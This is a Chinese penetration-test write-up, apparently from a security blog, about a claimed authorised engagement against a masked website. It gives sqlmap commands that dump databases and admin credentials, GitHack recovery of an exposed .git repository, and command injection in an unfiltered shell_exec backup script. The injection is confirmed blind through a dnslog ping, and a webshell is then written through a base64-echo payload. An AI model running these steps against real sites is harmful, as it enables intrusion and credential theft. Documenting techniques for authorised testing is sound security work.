旧文重发：之前投稿到安译首发，现在重发申请一下原创。

0x00 前言

曾经搞站最经典的套路就是：注入拿到密码进后台，上传shell然后内核提权。但是实际环境中，往往会有注入后密码解不开、找不到后台等情况，所以现在有的师傅说sql注入还不如xss。

这里分享一个实际案例，在一次项目中遇到上述情况后我如何转变思路最终拿下目标。如有漏码少码导致能定位目标请师傅们手下留情，后台留言提醒必有红包重谢！

0x01 详细步骤

1、网站界面就不放了，打码太累了，直接跳到随意点点后发现可疑参数，并确定存在漏洞的截图。

and 1=1页面显示正常，and 1=0页面变空白确定存在数字型注入，order by确定共4列，最后用select 1,2,3,4确定第2列回显。

2、之前探测发现没有waf，那就直接sqlmap一把梭。

【跑当前库名】：python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db【跑所有数据库名】：python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs【标绿色的为当前数据库】:xxx_history

3、跑当前数据库表名。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --tables

标绿色的表为我认为是存放管理员数据的表：

4、直接拖管理表的数据。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump

居然是明文密码，现在明文密码很少见了，不过考虑到目标网站有点历史悠久，也能理解。

5、虽然获得了管理员密码，但是找不到后台，常用的/admin、/login、/manage都试了。

6、用脚本扫目录，字典用的是御剑的标准字典。得到以下敏感目录（截图不全）。

7、.git目录存在即git源码泄露漏洞，用GitHack脚本恢复了整站源码，一大坨，截图就不放了，放个数字你们感受下。

python2 GitHack.py https://www.马赛克.com/.git/

8、根据名字确定其中疑似后台的目录：

9、访问试试，/admin1已经404了，因为git中留存的是历史代码，所以目录被改名或删除都有可能。

10、/7mysql7需要输入密码，试了不是之前注出的密码。

11、xxxquestions目录下的wp-admin倒是可以进，但是也不是之前注出的密码。

12、之前看到还有个xxx_questions数据库，再用sqlmap去跑一下试试：

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump

13、这种加密是wordpress特有的加密，cmd5有针对该框架的解密，但是这个密码似乎太复杂，解不出。

14、至此sql注入后【有密码找不到后台、有后台解不开密码】的情况就都碰到了。渗透似乎陷入僵局，没关系，手里的源码还有利用价值，拖到D盾里自动审计一下。

15、访问那个级别5的已知后门，原来已经被人日过了，是个黑页：hacked by XXX。这个网站比较有历史了，可能这个黑页也是很多年前的某个娱乐圈黑客搞的。

16、访问级别4的shell_exec后门，是个空白页面，查看手中的源代码，发现是一个备份脚本，有可能是同行留的，也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。

17、脚本逻辑：接收了POST的filename参数，然后执行打包备份，但是参数传进shell_exec之前没有做过滤，产生了命令执行的漏洞。用linux的命令连接符分号，可以在后面拼接任意命令，这里尝试一下执行whoami，但是还是空白页面。

18、想到是因为shell_exec函数没有回显，也不知道命令执行成功没有，这里我们用公开免费的dnslog平台去接收没有回显的注入：http://www.dnslog.cn/，用法如下：

先点击Get SubDomain在平台获取一个域名

19、然后执行ping命令，反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里，linux系统使用ping命令要加-c指定次数，不然会一直ping个没完。

20、去平台点击Refresh Record刷新（不要刷新整个网页），获取到解析日志。

可以看到命令是执行成功了的。whoami的回显为www-data

21、确认了漏洞存在，接下来利用漏洞写一句话，注意因为一句话中包含特殊字符，要编码后写入，payload如下

echo base64编码后的一句话|base64 -d > shell.php

（实战中不要用这个文件名，有授权的测试随便，但要注意文件名对waf来说也是一种特征）

22、写马成功

23、客户没有授权内网，项目结束。

0x02 后记

如有漏码少码导致能定位目标请师傅们手下留情，后台留言提醒必有红包重谢！

如有漏码少码导致能定位目标请师傅们手下留情，后台留言提醒必有红包重谢！

如有漏码少码导致能定位目标请师傅们手下留情，后台留言提醒必有红包重谢！

END.

喵，点个赞再走吧~

本文始发于微信公众号（小黑的安全笔记）：渗透实战 | SQL注入的局限